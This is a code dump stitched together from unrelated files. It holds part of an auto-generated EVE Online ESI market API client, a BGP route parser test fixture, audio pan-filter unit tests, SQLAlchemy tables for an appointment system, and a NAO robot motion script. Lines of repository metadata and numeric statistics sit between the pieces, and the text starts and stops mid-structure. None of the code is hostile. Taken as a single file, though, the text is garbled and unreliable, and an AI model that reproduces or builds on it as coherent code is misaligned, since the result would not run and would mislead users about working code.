'description': 'Unprocessable entity message', 'title': 'get_markets_region_id_orders_422_unprocessable_entity'}}, 'description': 'Unprocessable entity', 'title': 'get_markets_region_id_orders_unprocessable_entity'}, 'examples': {'application/json': {'error': 'Unprocessable entity message'}}, 'description': 'Not found'}}
def get(self, region_id, datasource="tranquility",order_type="all",page=1,**kwargs):
"""
Return a list of orders in a region
---
Alternate route: `/v1/markets/{region_id}/orders/`
Alternate route: `/legacy/markets/{region_id}/orders/`
Alternate route: `/dev/markets/{region_id}/orders/`
---
This route is cached for up to 300 seconds
:type region_id: int
:param region_id: Return orders in this region
:type datasource: str
:param datasource: The server name you would like data from
:type order_type: str
:param order_type: Filter buy/sell orders, return all orders by default. If you query without type_id, we always return both buy and sell orders.
:type page: int
:param page: Which page to query, only used for querying without type_id. Starting at 1
:param kwargs: type_id, user_agent, X-User-Agent
"""
kwargs_dict ={
"region_id" : region_id, "datasource" : datasource, "order_type" : order_type, "page" : page,
}
kwargs_dict.update(kwargs)
return EsiRequestObject(self.base_url, self.get_responses) \
.get(**kwargs_dict)
class MarketsStructuresDetail(object):
base_url = "https://esi.tech.ccp.is/latest/markets/structures/{structure_id}/"
get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_structures_structure_id_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_structures_structure_id_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '403': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Forbidden message', 'title': 'get_markets_structures_structure_id_403_forbidden'}}, 'description': 'Forbidden', 'title': 'get_markets_structures_structure_id_forbidden'}, 'examples': {'application/json': {'error': 'Token is not valid for scope(s): esi-markets.structure_markets.v1'}}, 'description': 'Forbidden'}, '200': {'schema': {'items': {'title': 'get_markets_structures_structure_id_200_ok', 'type': 'object', 'properties': {'duration': {'format': 'int32', 'type': 'integer', 'description': 'duration integer', 'title': 'get_markets_structures_structure_id_duration'}, 'price': {'format': 'float', 'type': 'number', 'description': 'price number', 'title': 'get_markets_structures_structure_id_price'}, 'location_id': {'format': 'int64', 'type': 'integer', 'description': 'location_id integer', 'title': 'get_markets_structures_structure_id_location_id'}, 'min_volume': {'format': 'int32', 'type': 'integer', 'description': 'min_volume integer', 'title': 'get_markets_structures_structure_id_min_volume'}, 'range': {'enum': ['station', 'region', 'solarsystem', '1', '2', '3', '4', '5', '10', '20', '30', '40'], 'type': 'string', 'description': 'range string', 'title': 'get_markets_structures_structure_id_range'}, 'issued': {'format': 'date-time', 'type': 'string', 'description': 'issued string', 'title': 'get_markets_structures_structure_id_issued'}, 'is_buy_order': {'type': 'boolean', 'description': 'is_buy_order boolean', 'title': 'get_markets_structures_structure_id_is_buy_order'}, 'order_id': {'format': 'int64', 'type': 'integer', 'description': 'order_id integer', 'title': 'get_markets_structures_structure_id_order_id'}, 'volume_total': {'format': 'int32', 'type': 'integer', 'description': 'volume_total integer', 'title': 'get_markets_structures_structure_id_volume_total'}, 'volume_remain': {'format': 'int32', 'type': 'integer', 'description': 'volume_remain integer', 'title': 'get_markets_structures_structure_id_volume_remain'}, 'type_id': {'format': 'int32', 'type': 'integer', 'description': 'type_id integer', 'title': 'get_markets_structures_structure_id_type_id'}}, 'description': '200 ok object', 'required': ['order_id', 'type_id', 'location_id', 'volume_total', 'volume_remain', 'min_volume', 'price', 'is_buy_order', 'duration', 'issued', 'range']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_structures_structure_id_ok'}, 'examples': {'application/json': [{'duration': 90, 'price': 9.9, 'location_id': 60005599, 'min_volume': 1, 'range': 'region', 'issued': '2016-09-03T05:12:25Z', 'is_buy_order': False, 'order_id': 4623824223, 'volume_total': 2000000, 'volume_remain': 1296000, 'type_id': 34}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of orders'}}
def get(self, structure_id, datasource="tranquility",page=1,**kwargs):
"""
Return all orders in a structure
---
Alternate route: `/v1/markets/structures/{structure_id}/`
Alternate route: `/legacy/markets/structures/{structure_id}/`
Alternate route: `/dev/markets/structures/{structure_id}/`
---
This route is cached for up to 300 seconds
:type structure_id: int
:param structure_id: Return orders in this structure
:type datasource: str
:param datasource: The server name you would like data from
:type page: int
:param page: Which page to query, starting at 1
:param kwargs: token, user_agent, X-User-Agent
"""
kwargs_dict ={
"structure_id" : structure_id, "datasource" : datasource, "page" : page,
}
kwargs_dict.update(kwargs)
return EsiRequestObject(self.base_url, self.get_responses) \
.get(**kwargs_dict)
class MarketsDetailHistory(object):
base_url = "https://esi.tech.ccp.is/latest/markets/{region_id}/history/"
get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_region_id_history_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_region_id_history_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '200': {'schema': {'items': {'title': 'get_markets_region_id_history_200_ok', 'type': 'object', 'properties': {'date': {'format': 'date', 'type': 'string', 'description': 'The date of this historical statistic entry', 'title': 'get_markets_region_id_history_date'}, 'highest': {'format': 'float', 'type': 'number', 'description': 'highest number', 'title': 'get_markets_region_id_history_highest'}, 'average': {'format': 'float', 'type': 'number', 'description': 'average number', 'title': 'get_markets_region_id_history_average'}, 'order_count': {'format': 'int64', 'type': 'integer', 'description': 'Total number of orders happened that day', 'title': 'get_markets_region_id_history_order_count'}, 'lowest': {'format': 'float', 'type': 'number', 'description': 'lowest number', 'title': 'get_markets_region_id_history_lowest'}, 'volume': {'format': 'int64', 'type': 'integer', 'description': 'Total', 'title': 'get_markets_region_id_history_volume'}}, 'description': '200 ok object', 'required': ['date', 'order_count', 'volume', 'highest', 'average', 'lowest']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_region_id_history_ok'}, 'examples': {'application/json': [{'date': '2015-05-01', 'highest': 5.27, 'average': 5.25, 'order_count': 2267, 'lowest': 5.11, 'volume': 16276782035}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of historical market statistics'}, '422': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Unprocessable entity message', 'title': 'get_markets_region_id_history_422_unprocessable_entity'}}, 'description': 'Unprocessable entity', 'title': 'get_markets_region_id_history_unprocessable_entity'}, 'examples': {'application/json': {'error': 'Unprocessable entity message'}}, 'description': 'Not found'}}
def get(self, region_id, type_id, datasource="tranquility",**kwargs):
"""
Return a list of historical market statistics for the specified type in a region
---
Alternate route: `/v1/markets/{region_id}/history/`
Alternate route: `/legacy/markets/{region_id}/history/`
Alternate route: `/dev/markets/{region_id}/history/`
---
This route is cached for up to 3600 seconds
:type region_id: int
:param region_id: Return statistics in this region
:type type_id: int
:param type_id: Return statistics for this type
:type datasource: str
:param datasource: The server name you would like data from
:param kwargs: user_agent, X-User-Agent
"""
kwargs_dict ={
"region_id" : region_id, "type_id" : type_id, "datasource" : datasource,
}
kwargs_dict.update(kwargs)
return EsiRequestObject(self.base_url, self.get_responses) \
.get(**kwargs_dict)
class MarketsPrices(object):
base_url = "https://esi.tech.ccp.is/latest/markets/prices/"
get_responses = {'500': {'schema': {'type': 'object', 'properties': {'error': {'type': 'string', 'description': 'Internal server error message', 'title': 'get_markets_prices_500_internal_server_error'}}, 'description': 'Internal server error', 'title': 'get_markets_prices_internal_server_error'}, 'examples': {'application/json': {'error': "uncaught exception: IOError('out of memory')"}}, 'description': 'Internal server error'}, '200': {'schema': {'items': {'title': 'get_markets_prices_200_ok', 'type': 'object', 'properties': {'adjusted_price': {'format': 'float', 'type': 'number', 'description': 'adjusted_price number', 'title': 'get_markets_prices_adjusted_price'}, 'average_price': {'format': 'float', 'type': 'number', 'description': 'average_price number', 'title': 'get_markets_prices_average_price'}, 'type_id': {'format': 'int32', 'type': 'integer', 'description': 'type_id integer', 'title': 'get_markets_prices_type_id'}}, 'description': '200 ok object', 'required': ['type_id']}, 'type': 'array', 'description': '200 ok array', 'title': 'get_markets_prices_ok'}, 'examples': {'application/json': [{'adjusted_price': 306988.09, 'average_price': 306292.67, 'type_id': 32772}]}, 'headers': {'Expires': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}, 'Cache-Control': {'type': 'string', 'description': 'The caching mechanism used'}, 'Last-Modified': {'type': 'string', 'description': 'RFC7231 formatted datetime string'}}, 'description': 'A list of prices'}}
def get(self, datasource="tranquility",**kwargs):
"""
Return a list of prices
---
Alternate route: `/v1/markets/prices/`
Alternate route: `/legacy/markets/prices/`
Alternate route: `/dev/markets/prices/`
---
This route is cached for up to 3600 seconds
:type datasource: str
:param datasource: The server name you would like data from
:param kwargs: user_agent, X-User-Agent
"""
kwargs_dict ={
"datasource" : datasource,
}
kwargs_dict.update(kwargs)
return EsiRequestObject(self.base_url, self.get_responses) \
.get(**kwargs_dict) | 98.348101 | 3,530 | 0.679516 | 1,839 | 15,539 | 5.495922 | 0.112017 | 0.041951 | 0.078658 | 0.060255 | 0.848422 | 0.824775 | 0.736123 | 0.688335 | 0.665875 | 0.640843 | 0 | 0.027292 | 0.139327 | 15,539 | 158 | 3,531 | 98.348101 | 0.728428 | 0.178326 | 0 | 0.390244 | 1 | 0 | 0.64028 | 0.174908 | 0 | 0 | 0 | 0 | 0 | 1 | 0.097561 | false | 0 | 0.02439 | 0 | 0.512195 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 8 |
182e2c0ab96081eddea139ce0c7c46394dbeba54 | 12,034 | py | Python | src/genie/libs/parser/iosxe/tests/ShowIpBgpAll/cli/equal/golden_output2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 204 | 2018-06-27T00:55:27.000Z | 2022-03-06T21:12:18.000Z | src/genie/libs/parser/iosxe/tests/ShowIpBgpAll/cli/equal/golden_output2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 468 | 2018-06-19T00:33:18.000Z | 2022-03-31T23:23:35.000Z | src/genie/libs/parser/iosxe/tests/ShowIpBgpAll/cli/equal/golden_output2_expected.py | balmasea/genieparser | d1e71a96dfb081e0a8591707b9d4872decd5d9d3 | [
"Apache-2.0"
] | 309 | 2019-01-16T20:21:07.000Z | 2022-03-30T12:56:41.000Z | expected_output = {
"vrf": {
"L3VPN-0050": {
"address_family": {
"vpnv4 unicast RD 5918:50": {
"bgp_table_version": 27013588,
"default_vrf": "L3VPN-0050",
"route_distinguisher": "5918:50",
"route_identifier": "10.169.197.254",
"routes": {
"172.16.200.1/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.10/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.11/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.12/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.13/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.14/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.15/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.16/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.17/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.18/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.19/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.2/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.20/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.3/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.4/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.5/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.6/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.7/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.8/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.9/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
"172.16.200.99/32": {
"index": {
1: {
"localpref": 100,
"next_hop": "10.13.202.64",
"origin_codes": "i",
"path": "60000",
"status_codes": "*>i",
"weight": 0,
}
}
},
},
"vrf_route_identifier": "192.168.10.254",
}
}
}
}
}
| 44.57037 | 63 | 0.170766 | 563 | 12,034 | 3.522202 | 0.115453 | 0.12708 | 0.08472 | 0.18003 | 0.885527 | 0.885527 | 0.885527 | 0.885527 | 0.885527 | 0.885527 | 0 | 0.212084 | 0.727688 | 12,034 | 269 | 64 | 44.736059 | 0.393042 | 0 | 0 | 0.624535 | 0 | 0 | 0.176915 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 1 | 1 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 10 |
185b2eb34f8e0c0f1c8d25a74069654523c27d07 | 2,052 | py | Python | tests/Python/Tools/PyATKTools_Pan_test.py | apohl79/AudioTK | 05ac241b0bc6a8f841d93257b4d81e5961b1f627 | [
"BSD-3-Clause"
] | 10 | 2018-05-17T15:29:05.000Z | 2021-12-19T22:26:08.000Z | tests/Python/Tools/PyATKTools_Pan_test.py | apohl79/AudioTK | 05ac241b0bc6a8f841d93257b4d81e5961b1f627 | [
"BSD-3-Clause"
] | null | null | null | tests/Python/Tools/PyATKTools_Pan_test.py | apohl79/AudioTK | 05ac241b0bc6a8f841d93257b4d81e5961b1f627 | [
"BSD-3-Clause"
] | 2 | 2020-04-21T13:43:57.000Z | 2020-04-28T19:10:14.000Z | #!/usr/bin/env python
from nose.tools import raises
def Pan_linear_left_test():
import numpy as np
from ATK.Core import DoubleInPointerFilter, DoubleOutPointerFilter
from ATK.Tools import DoublePanFilter
from numpy.testing import assert_almost_equal
t = np.arange(1000, dtype=np.float64)[None, :]
input = np.sin(t * 1000 * 2 * np.pi / 48000)
output = np.ascontiguousarray(np.zeros(2000, dtype=np.float64).reshape(2, -1))
inputfilter = DoubleInPointerFilter(input, False)
panfilter = DoublePanFilter()
outputfilter = DoubleOutPointerFilter(output, False)
inputfilter.set_output_sampling_rate(48000)
panfilter.set_input_sampling_rate(48000)
panfilter.set_pan_law(DoublePanFilter.LINEAR_TAPER)
panfilter.set_pan(-1)
outputfilter.set_input_sampling_rate(48000)
panfilter.set_input_port(0, inputfilter, 0)
outputfilter.set_input_port(0, panfilter, 0)
outputfilter.set_input_port(1, panfilter, 1)
outputfilter.process(1000)
assert_almost_equal(input[0], output[0])
assert_almost_equal(0, output[1])
def Pan_linear_right_test():
import numpy as np
from ATK.Core import DoubleInPointerFilter, DoubleOutPointerFilter
from ATK.Tools import DoublePanFilter
from numpy.testing import assert_almost_equal
t = np.arange(1000, dtype=np.float64)[None, :]
input = np.sin(t * 1000 * 2 * np.pi / 48000)
output = np.ascontiguousarray(np.zeros(2000, dtype=np.float64).reshape(2, -1))
inputfilter = DoubleInPointerFilter(input, False)
panfilter = DoublePanFilter()
outputfilter = DoubleOutPointerFilter(output, False)
inputfilter.set_output_sampling_rate(48000)
panfilter.set_input_sampling_rate(48000)
panfilter.set_pan_law(DoublePanFilter.LINEAR_TAPER)
panfilter.set_pan(1)
outputfilter.set_input_sampling_rate(48000)
panfilter.set_input_port(0, inputfilter, 0)
outputfilter.set_input_port(0, panfilter, 0)
outputfilter.set_input_port(1, panfilter, 1)
outputfilter.process(1000)
assert_almost_equal(input[0], output[1])
assert_almost_equal(0, output[0])
| 31.569231 | 80 | 0.771442 | 273 | 2,052 | 5.593407 | 0.205128 | 0.05239 | 0.066798 | 0.102161 | 0.949574 | 0.91814 | 0.91814 | 0.91814 | 0.91814 | 0.91814 | 0 | 0.060403 | 0.128655 | 2,052 | 64 | 81 | 32.0625 | 0.793624 | 0.009747 | 0 | 0.8 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.133333 | 1 | 0.044444 | false | 0 | 0.2 | 0 | 0.244444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a10a7911ded0d566e2da5267e51c931ddf12dcfd | 5,308 | py | Python | app/tables/__init__.py | LIhDi/python-atendimento-agendamento-back-end | affb722440678415d1d6293e84be3f1743c915b7 | [
"MIT"
] | null | null | null | app/tables/__init__.py | LIhDi/python-atendimento-agendamento-back-end | affb722440678415d1d6293e84be3f1743c915b7 | [
"MIT"
] | null | null | null | app/tables/__init__.py | LIhDi/python-atendimento-agendamento-back-end | affb722440678415d1d6293e84be3f1743c915b7 | [
"MIT"
] | null | null | null | import sqlalchemy
metadata = sqlalchemy.MetaData()
appointment_status = sqlalchemy.Table(
"appointment_status",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
schedule_status = sqlalchemy.Table(
"schedule_status",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
attendance_status = sqlalchemy.Table(
"attendance_status",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
units = sqlalchemy.Table(
"units",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("email", sqlalchemy.String(length=128)),
sqlalchemy.Column("phone", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("attendants_number", sqlalchemy.Integer()),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
appointments = sqlalchemy.Table(
"appointments",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column(sqlalchemy.ForeignKey("subjects.id_int"), type_=sqlalchemy.Integer, name="id_subject"),
sqlalchemy.Column(sqlalchemy.ForeignKey("schedules.id_int"), type_=sqlalchemy.Integer, name="id_schedule"),
sqlalchemy.Column(sqlalchemy.ForeignKey("attendances.id_int"), type_=sqlalchemy.Integer, name="id_attendance"),
sqlalchemy.Column(sqlalchemy.ForeignKey("appointment_status.id_int"), type_=sqlalchemy.Integer, name="id_appointment_status"),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("email", sqlalchemy.String(length=128)),
sqlalchemy.Column("national_registration", sqlalchemy.String(length=32)),
sqlalchemy.Column("arrived_at", sqlalchemy.DateTime()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime()),
)
subjects = sqlalchemy.Table(
"subjects",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column("name", sqlalchemy.String(length=128)),
sqlalchemy.Column("code", sqlalchemy.String(length=128)),
sqlalchemy.Column("description", sqlalchemy.String(length=256)),
sqlalchemy.Column("active", sqlalchemy.Boolean()),
sqlalchemy.Column("dflag", sqlalchemy.Boolean()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime())
)
schedules = sqlalchemy.Table(
"schedules",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column(sqlalchemy.ForeignKey("units.id_int"), type_=sqlalchemy.Integer, name="id_unit"),
sqlalchemy.Column(sqlalchemy.ForeignKey("schedule_status.id_int"), type_=sqlalchemy.Integer, name="id_schedule_status"),
sqlalchemy.Column("id_employee", sqlalchemy.String(length=128)),
sqlalchemy.Column("schedule_date", sqlalchemy.DateTime()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime()),
)
attendances = sqlalchemy.Table(
"attendances",
metadata,
sqlalchemy.Column("id_int", sqlalchemy.Integer, primary_key=True),
sqlalchemy.Column(sqlalchemy.ForeignKey("attendance_status.id_int"), type_=sqlalchemy.Integer, name="id_attendance_status"),
sqlalchemy.Column("id_employee", sqlalchemy.String(length=128)),
sqlalchemy.Column("rating", sqlalchemy.Integer()),
sqlalchemy.Column("start_time", sqlalchemy.DateTime()),
sqlalchemy.Column("end_time", sqlalchemy.DateTime()),
sqlalchemy.Column("updated_at", sqlalchemy.DateTime()),
sqlalchemy.Column("created_at", sqlalchemy.DateTime()),
)
| 43.508197 | 130 | 0.738508 | 558 | 5,308 | 6.894265 | 0.09319 | 0.286977 | 0.125812 | 0.103977 | 0.811282 | 0.799844 | 0.799844 | 0.783208 | 0.72758 | 0.722381 | 0 | 0.013702 | 0.106255 | 5,308 | 121 | 131 | 43.867769 | 0.797218 | 0 | 0 | 0.601942 | 0 | 0 | 0.152961 | 0.021313 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.009709 | 0 | 0.009709 | 0 | 0 | 0 | 0 | null | 1 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
a165803e0c1e00671de9dfdf655a76d11dea968b | 4,152 | py | Python | rise_hand_pen.py | DACUS1995/NAO---Robot-Human-interaction | f14233850afd83c3a450f39944745b5f7288ebd9 | [
"MIT"
] | 1 | 2019-08-30T13:07:24.000Z | 2019-08-30T13:07:24.000Z | rise_hand_pen.py | DACUS1995/NAO---Robot-Human-interaction | f14233850afd83c3a450f39944745b5f7288ebd9 | [
"MIT"
] | null | null | null | rise_hand_pen.py | DACUS1995/NAO---Robot-Human-interaction | f14233850afd83c3a450f39944745b5f7288ebd9 | [
"MIT"
] | null | null | null |
from naoqi import ALProxy
IP = "192.168.0.125"
names = list()
times = list()
keys = list()
names.append("HeadPitch")
times.append([1, 2])
keys.append([[-0.17, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.17, [3, -0.333333, 0], [3, 0, 0]]])
names.append("HeadYaw")
times.append([1, 2])
keys.append([[0, [3, -0.333333, 0], [3, 0.333333, 0]], [0, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LAnklePitch")
times.append([1, 2])
keys.append([[0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LAnkleRoll")
times.append([1, 2])
keys.append([[-0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LElbowRoll")
times.append([1, 2])
keys.append([[-0.410929, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.410929, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LElbowYaw")
times.append([1, 2])
keys.append([[-1.19386, [3, -0.333333, 0], [3, 0.333333, 0]], [-1.19386, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHand")
times.append([1, 2])
keys.append([[0.3, [3, -0.333333, 0], [3, 0.333333, 0]], [0.3, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHipPitch")
times.append([1, 2])
keys.append([[0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHipRoll")
times.append([1, 2])
keys.append([[0.1, [3, -0.333333, 0], [3, 0.333333, 0]], [0.1, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LHipYawPitch")
times.append([1, 2])
keys.append([[-0.17, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.17, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LKneePitch")
times.append([1, 2])
keys.append([[-0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [-0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LShoulderPitch")
times.append([1, 2])
keys.append([[1.4712, [3, -0.333333, 0], [3, 0.333333, 0]], [1.4468, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LShoulderRoll")
times.append([1, 2])
keys.append([[0.184555, [3, -0.333333, 0], [3, 0.333333, 0]], [0.217065, [3, -0.333333, 0], [3, 0, 0]]])
names.append("LWristYaw")
times.append([1, 2])
keys.append([[0.0999997, [3, -0.333333, 0], [3, 0.333333, 0]], [0.0999997, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RAnklePitch")
times.append([1, 2])
keys.append([[0.09, [3, -0.333333, 0], [3, 0.333333, 0]], [0.09, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RAnkleRoll")
times.append([1, 2])
keys.append([[0.13, [3, -0.333333, 0], [3, 0.333333, 0]], [0.13, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RElbowRoll")
times.append([1, 2])
keys.append([[0.410929, [3, -0.333333, 0], [3, 0.333333, 0]], [0.410929, [3, -0.333333, 0], [3, 0, 0]]])
names.append("RElbowYaw")
times.append([1, 2])
